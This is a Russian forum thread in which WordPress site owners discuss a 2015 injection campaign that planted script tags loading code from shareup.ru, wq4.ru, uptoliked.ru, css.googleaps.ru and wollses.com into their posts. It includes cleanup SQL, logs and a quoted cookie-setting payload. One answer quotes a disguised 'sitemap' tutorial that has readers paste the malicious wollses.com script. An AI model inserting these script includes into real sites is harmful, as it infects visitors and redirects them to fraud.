Сегодня встретил в коде uptoliked.ru, css.googleaps.ru, wq4.ru, shareup.ru/social.js что это?

Question

[WQ13]

Сегодня (07.07.2015) на 4 сайтах, которые работают под CMS Wordpress, в каждой записи, на каждой страницы обнаружил такую строчку

<script type="text/javascript" src="//shareup.ru/social.js"></script>

и на одном вот такую

<script type="text/javascript" src="//wq4.ru/social.js"></script>

обнаружил её тока по чистой случайности, когда начал разбираться почему сайты начали грузиться с задержкой 5-10 секунд, учитывая что на них комменты и регистрация отключена, и работают как визитницы, оказалось сайт shareup.ru на который ссылался этот JS был недоступен какое то время. Сам файлик JS пустой, не какого кода не имеет, но тут проскочила другая мысль, может проблема сейчас ,где то глубже, которая ещё не аукнулась? да и может кто знает, где дыру залатывать? Заранее спасибо)



После чистки, это скрипта из кода, смена паролей и активирования почти всех пунктов безопасности в плагине (iThemes Security) ситуация не изменилась (10.07.2015) этот скрипт опять добавился, есть подозрения на уязвимость какого то из плагинов

-------------------------------------

к продолжению истории 25.07.2015 во всех ссылках появился код следующего содержания

document.write("<img src='//counter.yadro.ru/hit;wq4all?t44.1;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' style='display:none' "+
"border='0' width='1' height='1'>");

и одна из ссылок изменила свой вид

<script src="//css.googleaps.ru/css?f=Open+Sans&amp;cd=mb&amp;ver=4.2.2" type="mce-text/javascript"></script>

Comments

[zolti]

Сегодня снова, спустя неделю после чистки и замены всех мыслимых паролей появился этот скрипт по всех страницах сайта...

[WQ13]

теперь скрипт уже не пустой, во всех ссылках появился один и тот же код

Answer 1

[airjordan23]

У меня из-за этого Яндекс фильтранул сайт. Минус 20 и более позиций по всем запросам. Начал им писать, разбираться, вроде бы JS скрипт этот является мобильным редиректом, хотя с ПК смотришь и файл пустой.
Похоже добавляется он в посты SQL-инъекцией, следовательно, будет полезным изменить префикс таблиц, у кого стандартный. Собственно, возникает вопрос: у кого появился JS, префикс таблиц стандартный? Пусть не закрыть уязвимость, но может хоть временно решить вопрос?

Comments

[zolti]

У меня префикс таблиц не стандартный, но проблема присутствует.

[Татьяна]

Привет из 2020, два скрипта на сайте

<script type="text/javascript" src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
<script type="text/javascript" src="//uptoliked.ru/widjets.js"></script>

В первом случае ответ сервера 403, куки навешивает "lf" "wadad", во втором случае, эти куки проверяются и вроде как осуществляется редирект.
Сайт старый, как-то пропустила мимо глаз стандартный префикс. Вытащила дамп базы, выпилила эти строчки, заменила префикс, ещё кое-что шаманила, не знаю поможет или нет.
Яндекс грохнул в позиция и выкатил значок фатальной ошибки "обман пользователей мобильных сетей"\платные подписки и все такое.
Чекали до этого Ревизиум, сказали, что все чисто. Но чекали, если я правильно понимаю, только файлы темы и шаблоны самого WP, так что к ним вопросов нет.
Я не смогла сымитировать редиректы, так что искала, практически вслепую. Хостеры тоже не помогли с редиректами, точнее тоже не увидели их.
Такие дела.

Answer 2

[sergey_dudin_com]

Сегодня обнаружил в статьях строчки

Версия WP 4.2.4
Плагины:
Akismet
Anti-XSS attack
Append Link on Copy
AviaSales поиск авиабилетов
Broken Link Checker
Dagon Design Sitemap Generator
Disqus Comment System
Easy Contact Forms
Facebook Page Promoter Lightbox
FancyBox for WordPress
Google Analytics by Yoast
Instagram-Widget-for-WordPress
MaxSite Russian Date
Regenerate Thumbnails
RusToLat
Simple Instagram Embed
Simply Exclude
Ultimate Coming Soon Page
WordPress File Monitor
WordPress Related Posts
WP-Optimize
Список страниц
Yoast SEO
Прятатель ссылок PRO
Супер лидген 1.0

Посмотрел лог файла, увидел там много подобных строчек

brnx.ru 213.243.84.38 - - [10/Aug/2015:13:52:08 +0300] "GET /wp-admin/edit.php?s=shareup.ru%2Fsocial.js&post_status=all&post_type=post&_wpnonce=777e117719&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fs%26post_status%3Dall%26post_type%3Dpost%26m%3D0%26cat%3D0%26seo_filter%26paged%3D24%26mode%3Dlist%26se_cfg%255Bpost%255D%255Bterms%255D%255Bis_feed%255D%255B44203%255D%3Don%26se_cfg%255Bpost%255D%255Bterms%255D%255Bis_home%255D%255B44203%255D%3Don%26ids%3D1051%252C1046%252C956%252C824&action=-1&m=0&cat=0&seo_filter=&paged=1&mode=list&action2=-1 HTTP/1.0" 302 - "brnx.ru/wp-admin/edit.php?s&post_status=all&post_t..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 YaBrowser/15.7.2357.2700 Safari/537.36"

brnx.ru 213.243.84.38 - - [10/Aug/2015:13:52:09 +0300] "GET /wp-admin/edit.php?s=shareup.ru%2Fsocial.js&post_status=all&post_type=post&action=-1&m=0&cat=0&seo_filter&paged=1&mode=list&action2=-1 HTTP/1.0" 200 186108 "brnx.ru/wp-admin/edit.php?s&post_status=all&post_t..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 YaBrowser/15.7.2357.2700 Safari/537.36"
brnx.ru 213.243.84.38 - - [10/Aug/2015:13:52:10 +0300] "POST /wp-admin/admin-ajax.php HTTP/1.0" 200 - "brnx.ru/wp-admin/edit.php?s=shareup.ru%2Fsocial.js&post_status=all&post_type=post&action=-1&m=0&cat=0&seo_filter&paged=1&mode=list&action2=-1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 YaBrowser/15.7.2357.2700 Safari/537.36"

Как понять где уязвимость?

Comments

[crazymozg]

удалось ли Вам разобраться в причинах? Появлялся ли вредоносный код снова после первичной чистки БД от него?

[sergey_dudin_com]

crazymozg: скачал БД, открыл в Notepad, удалил все строчки, и заново залил БД на сайт. Потом удалил все неактивные плагины и темы, поменял пароль к админке и БД. Неделя прошла, больше кода не видно)

Answer 3

[zooks]

Скорей всего зараженный сайт.

Answer 4

[casualx]

У меня появляются такие скрипты:

<script type="text/javascript" src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
<script type="text/javascript" src="//uptoliked.ru/widjets.js"></script>
<script type="text/javascript" src="//shareup.ru/social.js"></script>

Как действовать, чем лечить?

Comments

[Privatnic]

Удаляем методом замены на пустую строку через SQL запрос, можно это сделать в phpMyAdmin :

UPDATE wp_posts SET `post_content`
= REPLACE (`post_content`,
'<script type="text/javascript" src="//shareup.ru/social.js"></script>',
'');

UPDATE wp_posts SET `post_content`
= REPLACE (`post_content`,
'<script type="text/javascript" src="//uptoliked.ru/widjets.js"></script>',
'');

UPDATE wp_posts SET `post_content`
= REPLACE (`post_content`,
'<script type="text/javascript" src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>',
'');

UPDATE wp_posts SET `post_content`
= REPLACE (`post_content`,
'<script type="text/javascript" src="//wq4.ru/js.js"></script>',
'');

[casualx]

Privatnic: Спасибо!
Почистил записи!. Теперь бы найти вредокод...

[Diamond00744]

Существуют и вариации, которые тоже отдельно нужно затирать. Например, вместо

<script type="text/javascript" src="//wq4.ru/js.js"></script>

будет

<script src="//wq4.ru/js.js" type="text/javascript"></script>

[Мутный]

второй и третий в списке живут у reg.ru. Причем последний зареген 1 июля 2015. Как раз когда все началось.

[Мутный]

casualx: Нашли?

[casualx]

Вредоноса не нашел, но инъекций пока нет.

Answer 5

[guesteshop]

Проверил через гугл, с таким кодом в тексте уже очень много сайтов. Так же,, он вошел в конфликт на сайте.

Кто-то узнал как от этого излечиться?

-------------------

это инъекция, вставляется в БД. у меня было инфицировано более 33800 записей. чистил весь день. Работа сайта восстановилась, надолго ли, не знаю.

Comments

[zolti]

не на долго, я уже чистил, через неделю снова появляется.

[guesteshop]

пароль БД меняли?

[casualx]

Смена пароля к БД не помогает

Answer 6

[Jeick9]

Народ, у меня на 3-х сайтах такой же код подскажите как его найти?

Answer 7

[pansa]

У меня этот shareup прописался прямо в тексты post'ов , т.е файлы WP целы (у меня мониторинг на изменения в ФС и жесткое ограничение прав), а вот в БД кто-то покапался. Подозреваю, что это уязвимость в WP, возможно, еще не исправленная. Гугл выдает кучу сайтов, у которых эти строки криво втиснуты в тексты постов -- очень похоже, что орудует бот. =(

Answer 8

[zolti]

Заметил так же на своем ресурсе, появляется регулярно.
Давайте может быть выложим список плагинов и выясним какой из них виноват?

Comments

[zolti]

Проверил на всех своих сайтах, тестовых, и тех, которые сами обновляются и давно не используются - проблема есть везде. В каждом посте или странице есть инклюд js скрипта.

Answer 9

[Павел Шумилов]

Аналогичная проблема. На одном из сайтов на WordPress установлены следующие плагины:

All In One SEO Pack
Anti-spam
Contact Form 7
Faster Image Insert
Featured Content Gallery
Flexible Lightbox
My Category Order
RusToLat
WordPress Importer
WordPress Related Posts
WP-PageNavi
WP-Polls
Виджет анонсов
Карта сайта

На другом сайте, где тоже обнаружена эта "зараза", список плагинов:
Akismet
Category & Page I c o n s
HTML in Category Descriptions
My Category Order
New Google Plus Badge Widget
RusToLat
Spam Free Wordpress
WordPress Importer
WP Review
WP Tab Widget

Даже судя по этим двум сайтам общие плагины:
My Category Order
RusToLat
WordPress Importer

Comments

[zolti]

Дело все же не в плагине, как написали выше это инъекция сразу в бд. У меня есть сайты, на которых нет плагинов, кроме стандартных и там эта проблема присутствует. Специально поднял чистый wp, что бы посмотреть как быстро он станет заражен.
Не знаю что делать, надо как то написать разработчикам WP но что и предъявить мне не ясно.

[casualx]

Если это инъекция в БД, при чем тут WP? Нужн искать генератор этого мусора в БД.

Answer 10

[Варвара Синельникова]

Если вы пользуетесь услугами автосёрфинга, пройдите вот такой путь на своём компьютере C:\Documents and Settings\Admin\Application Data\Macromedia\Flash Player - и увидите там папку #SharedObjects, которая развеет ваши вопросы.

Comments

[zolti]

Вы точно по адресу комментарий оставили? Documents and Settigs - последний раз встречались еще на windpows xp.

[casualx]

C:\Users\admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects

[Варвара Синельникова]

zolti: Каков путь, не суть. Смысл в том, что откуда берётся. У меня до сих пор XP. Старый друг, так сказать. Вот другой путь вам добавили, а итог тот же.

[zolti]

varvarII: так с этим разобрались, но до конца еще не улавливаю, можете немного пояснить?

[Варвара Синельникова]

zolti: Эти скрипты только у сёрферов. Плагины-то тут при чём?

[zolti]

varvarII: да собственно про плагины это было догадка, которая потом не подтвердилась. мы тут пытаемся найти причину, как эти скрипты появляются в постах на wp и пока что то не складывается картинка :)

[Варвара Синельникова]

zolti: Подобное может возникать если на Вашем аккаунте есть вредоносные скрипты или доступы к Вашему аккаунту стали известны злоумышленникам.

Вот что рекомендуют провайдеры. Как вам?

1. Провести обновление всех плагинов и CMS на ваших сайтах. При этом необходимо перезаписать все файлы, а лучше предварительно удалить старые файлы на аккаунте и залить новые. При этом вернув только необходимые файлы от старого сайта.

Обратите внимание, что очень часто уязвимости бывают в темах для Ваших сайтов. Создатели таких тем специально их оставляют, чтобы использовать в своих целях.

2. Сменить пароли к панелям администраторов сайтов, а также к FTP.

Answer 11

[Андрей Саныч]

формы проверяйте на уязвимость. И вообще, нужно эти скрипты из запросов вырезать

preg_replace('/<script\b[^>]*>(.*?)<\/script>/is', "", $data)

Comments

[zolti]

форм на сайте нет вообще.

[Андрей Саныч]

zolti: киньте адрес сайта

[zolti]

destiny.wtf - форма с комментариями появилась несколько дней назад, до этого ее небыло, но эта гадость в постах все равно появляется.

Answer 12

[b0mber]

та же беда по всем WP сайтам, за исключением сайта на WP 3.1.2

Answer 13

[Diamond00744]

Я так понимаю, это случилось у многих более-менее популярных WP-сайтах, не успевших вовремя обновиться до патча 4.2.3.
Судя по описанию к этому обновлению, именно такую дыру оно и закрыло.

UPD от 4 августа: вышел фикс 4.2.4, исправляющий три уязвимости межсайтового скриптинга и возможность SQL-инъекции (CVE-2015-2213). Подробнее здесь. Думаю, теперь можно спать спокойно...

Comments

[zolti]

Нет, данное обновление не исправило проблему.
Сегодня снова на всех страницах наблюдаю тот же самый скрипт.

[Pisarev_OS]

Да, у меня тоже последние версии WP затронуло

[zolti]

Посмотрим что будет после 4.2.4

[avantus_rus]

zolti: есть эффект от 4.2.4? появляется опять эта зараза?

[Diamond00744]

avantus_rus: у меня больше ничего не появляется, хотя и вообще появилось всего один раз

[avantus_rus]

Diamond00744: Избавились удалением? Или ещё какие хитрости есть?

[Diamond00744]

avantus_rus: да, после обновления на 4.2.3 удалил автозаменой все вариации кода, больше ничего не появлялось, потом ещё обновился на 4.2.4. Но я всё ещё в ожидании худшего исхода, что какая-то закладка осталась внутри.

[avantus_rus]

Diamond00744: Спасибо за информацию. Будем следить за темой.

[zolti]

avantus_rus: нет не появлялось больше, слежу регулярно. все ок.

[crazymozg]

zolti: нет подозрений на шаблон? Он полностью официальный купленный/с репозитория, или сомнительный?

[Diamond00744]

crazymozg: шаблон у меня и вообще самописный, так что точно нет

[NaPoker]

У меня опять повылезал, уже новый код "". Предыдущая чистка и обновление до последней версии WP не помогли ((

[Diamond00744]

Вот и у меня снова всё вылезло...

Answer 14

[iliaprohor]

Заразились 2 сайта этими скриптами, долго искал решения, написал хостеру чтобы запустил айболит, в итоге по окончанию проверки нашел файл cache.php, удалил с сервера, сайты снова нормально грузятся, осталось позаботится о безопасности.

Comments

[zolti]

На загрузку сайтов этот инклюд никак не влияет, ибо то что он подгружает - пустой js файл.
И что же за cache.php это был? Где?

[iliaprohor]

zolti: у меня влияет еще как, сайты очень долго грузили поэтому начал искать в чем проблема, файл этот на одном сайте wp-content/uploads/wppa/watermarks/cache.php, на втором wp-content/uploads/2015/06/cache.php

[zolti]

Этот файл есть во всех WP сайтах, например здесь wp-includes/cache.php.
Если же мы говорим о другом, то на одном из зараженных сайтов у меня есть еще - wp-content/uploads/dynamic_avia/cache.php.
При этом у меня есть зараженные сайты, где такого файла вовсе нет. Не уверен, что он является причиной.

[iliaprohor]

zolti: мне помогло, буду следить, возможно опять скоро закинут что-нибудь.

[salexys]

zolti: если ваши остальные сайты размещаются на хостре в одной директории, то будут заражены все сайты, у меня там 6 сайтов в одной нашелся cache с вирусом, причем в двух экземплярах в папке upload а также в папке js. Удаляем их, и смотрим за развитием. На всех сайтах версия 4.2.3

Answer 15

[NaPoker]

У меня 5 сайтов на WP, на 3 из них обнаружил такие скрипты, что примечательно на всех трёх использую сео плагин "All In One SEO Pack", на двух не зараженных стоят другие сео плагины...

Comments

[Diamond00744]

Не подтверждаю. У меня на зараженном сайте не используется сей плагин, дело не в нём. Ну и сам этот плагин слишком популярный для такого и вообще не наш, а эти вредоскрипты на русских доменах располагаются.

Answer 16

[Erazistrat]

Я заметил, что у меня появились пользователи, кроме меня. Пользователей у меня на сайте быть не должно никаких. Всех удалил, поменял пароль к админке. Жду что будет дальше.
Прошу прощения за неполную информацию. Написать про этих пользователей уже не могу. Поторопился и удалил всех....
В общих настройках стояла галочка "Любой может зарегистрироваться" в качестве "Участник". Теперь, конечно же она тоже не стоит.

После проделанной процедуры все работает нормально, уже 2 дня ничего нет, хотя раньше они вновь появлялись ежедневно.

Кто пробовал смотреть пользователей? Отзовитесь. Появляются ли эти записи, если пользователей не было?

К сожалению, это тоже не помогло.

Answer 17

[crazymozg]

аналогичная проблема, каждая запись содержала

Почистил базу, буду смотреть появится ли снова.

Comments

[NaPoker]

Появились? У меня после чистки через несколько дней снова во всех записях вылезли ((

[crazymozg]

NaPoker: у меня вроде бы пока тишина...А версию ВП обновляли после чистки прошлой?

[NaPoker]

crazymozg: да, на всех сайтах последняя версия WP 4.3

Answer 18

[fedorf]

Проблема как мне кажется даже более серьезная sql-injection, у меня сайт находится в разработке и к нему закрыт доступ по ip, и тем не менее вот этот скрипт появился в ссылках

Возможно темы, но некоторые пишут, что на самописных даже появляется
Возможно плагины, но есть те, кто пишут что стоит стандартный набор
Остается sql-injection, но вот у меня сайт закрыт от внешнего доступа тогда возможно хостинг инфицирован.
Я думаю нужно хостинг проверить, посмотреть у какого какой

Comments

[crazymozg]

sql инъекция - в данном случае все равно каким то образом ее производят многократно, раз вставки кода появляются снова после удаления... Либо дырка остается незакрытой, либо вирус где то в файлах остается.
Хостинг - бегет.

[fedorf]

домены на которые ведут коды зарегистрированы на reg.ru - я отправил письмо с инфо об этом посте.
Судя по всему если у Вас бегет - это хостинг зарекомендовал себя в рунете, вряд ли он инфицирован.
Скорее всего происходит заражение через инфицированный файл, лежащий на сайте.
Мои еще варианты:
1. Продуцирующий скрипт лежит на сайте
2. Подает он на сайт один раз, прописывается в код и лежит до момента исполнения
3. Мобильные устройства (Интересно, что я заходил на сайт через мобилу, хоть у меня закрыт доступ извне, а мобила на том же ip - я этот вариант рассматриваю его тоже)
4. Браузер инфицирован при обращении к этому браузеру он делает инъекцию

Answer 19

[Крил]

Никак не доходили руки почистить 1 свой сайт и как оказалось заражены 22 сайта из 25 (2 локальные)
Удалось узнать как закрыть дыру?
Скиньте зараженный cache.php у кого есть для анализа.

Вот нашёл решение hlep.ru/udalyaem-skript-wollses-com-iz-kontenta

Answer 20

[Сергей Альтман]

Неделю назад вычистил весь сайт от

<script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>

Проверил файлы на вирусы, удалил зараженные, что-то восстановил из дистрибутива. Отключил все ненужные плагины, все остальные обновил. Обновил WP до 4.3.1, сменил все пароли.
Сегодня опять тоже самое во всех постах.

Так что проблема актуальна до сих пор.

Из тех плагинов, что писали выше, стоит только RusToLat
Сейчас отключу его...

PS: посмотрел еще один сайт, к которому у меня есть доступ. Там правда WP 4.1.8 и всего 4 плагина

Contact Form 7
Easy FancyBox
PHP Text Widget
WP reCaptcha Integration

Все страницы заспамлены другим кодом:
<script src="//wollses.com/steps.png"></script>

Comments

[Diamond00744]

У самого опять это всё всплыло... Сайты на одном сервере? Просто у меня другого объяснения нет.

Answer 21

[Андрей Моторов]

wollses.com/steps.png - та же фигня

вот только вот что гуглится:

Но на моих сайтах до сих пор стоит плагин Dagon Design Sitemap Generator и я его пока менять не собираюсь. Скачать его можно: тут https://yadi.sk/d/YJzDObVYjMeYh
Мне он нравится за стабильность работы и беспроблемность в установке:
1.Скачиваем плагин по ссылке сверху.
2.Устанавливаем на свой WordPress-овский сайта.
3.Создаем страницу с заголовкам "Карта сайта".
4.На странице нажимаем "источник" и вписываем следующий код:

<p>
    <!— ddsitemapgen —><br />
   <script src="//wollses.com/steps.png"></script>
</p>

5.После создания страницы переходим к вкладке "МЕНЮ" и добавляем эту страницу в "МЕНЮ".
Результатом будет появление данной страницы в пункте меню и нормальное отображение содержимого сайта на этой странице.

Comments

[Мутный]

на развод похоже

Answer 22

[Konstantin_T]

У меня тоже самое, на хостинге несколько сайтов на WP и на всех эта лабуда. Нашел такую информацию по данной теме:
username.name/chuzhoj-skript-v-postax-wordpress но еще не пробовал.
Кратко: Атаке подвергался файл xmlrpc.php корневого каталога.
Ограничил доступ к проблемному файлу, внеся в .htaccess

<Files xmlrpc.php>
order deny,allow
Deny from all
</Files>

Comments

[setevoy4]

Нагрузка на сервер из-за `xmlrpc.php` вызывается брутфорсом, про нее писали уже. Не думаю, что код в постах возникает из-за нее:
https://blog.sucuri.net/2015/10/brute-force-amplif...

Answer 23

[Мутный]

Нашли, откуда надувает эти скрипты?
Ко мне из Казани какой то настойчиво стучался. Из кальянной, если верить гугловской карте. Блокирнул. Пока тихо.

Answer 24

[setevoy4]

Столкнулся с тем же:

shareup.ru || social.js

Вычистил один раз - заметил снова.
Есть подозрение на RusToLat плагин.
Отключил, посмотрю через пару дней еще.

У меня установлены:

about-author
all-in-one-seo-pack
autoset-featured-image
clean-and-simple-contact-form-by-meg-nicholas
disqus-comment-system
dynamic-to-top
google-sitemap-generator
html-editor-syntax-highlighter
index.php
rating-widget
rustolat
sitemap-generator
social-networks-auto-poster-facebook-twitter-g
syntax-highlighter-with-add-button-in-editor
wordpress-23-related-posts-plugin
wordpress-importer
wp-autoset-featured-image-plus
wp-noexternallinks
wp-postviews
wp-to-twitter
yet-another-stars-rating

Лечил простым запросом:

UPDATE db1_posts SET post_content = REPLACE(post_content, '<script type="text/javascript" src="//shareup.ru/social.js"></script>', '') WHERE post_content LIKE '%src="//shareup.ru/social.js"></script>%';

Comments

[crazymozg]

а судя по чему именно этот плагин? Просто тоже он стоит везде, но подозрений на него не было

[zolti]

На самом деле не виноват никакой из плагинов, ибо даже на пустой площадке без тем и плагинов проблема проявляла себя. На сколько известно мне это была дыра в какой то их компонентов самой платформы WP, и была она исправлена уже несколько месяцев назад, может даже и пол года.

[setevoy4]

zolti: Не думаю. За обновлениями я всегда слежу, обновляю все доступное быстро. Тем не менее - проблема уже года полтора как была замечена.

[setevoy4]

crazymozg: sergey_dudin_com упоминал, что у него тоже установлен. Потмоу предположил, что проблема из-за него.

Answer 25

[hadahan]

Кто говорит что файл пустой, хз, у меня по ссылке shareup.ru/social.js вот что:

if (!lf) { var lf=1; document.cookie = 'lfj=1; expires=24/12/2016 17:23:47'; function get_cookie(cookie_name) { var results = document.cookie.match ( '(^|;) ?' + cookie_name + '=([^;]*)(;|$)' ); if (results) return ( unescape ( results[2] ) ); else return null; } var cooken=get_cookie('lfj'); document.write(''); }

Меня до этого взламывали много раз, с помощью дыр в модулях, темах, теперь я все беру из хранилища самого WP.

Shell - это настоящее зло (устраняйте дыры), могут незаметно что то поменять, не узнаешь пока Яша не забанит через несколько месяцев, а могут заразить и "перевернуть с ног наголову" все файлы на сервере, еще может быть шантаж типа "удалю и/или выложу в паблик ваши файлы если не заплатите".

Изменил порт ssh, стандартные пути к админкам WP и т.д., я удивился, когда увидел скрипт, но не подумал, что это вирус, теперь вот решил пробить обстановку...

А этот скрипт даже сервер не нагружал...

Удалил скрипты из статей и страниц, прописал в .htaccess:

<Files xmlrpc.php>
order deny,allow
Deny from all
</Files>

На VDS у меня 3 сайта на WP, заразился только 1 и то не все статьи, в файлах WP упоминания social.js нет.
Посмотрим, если НЕ напишу, то помогло...
p.s. Проблема годичной давности, а я 1-3 месяца назад все сайты переделывал (возможно не замечал этот скрипт).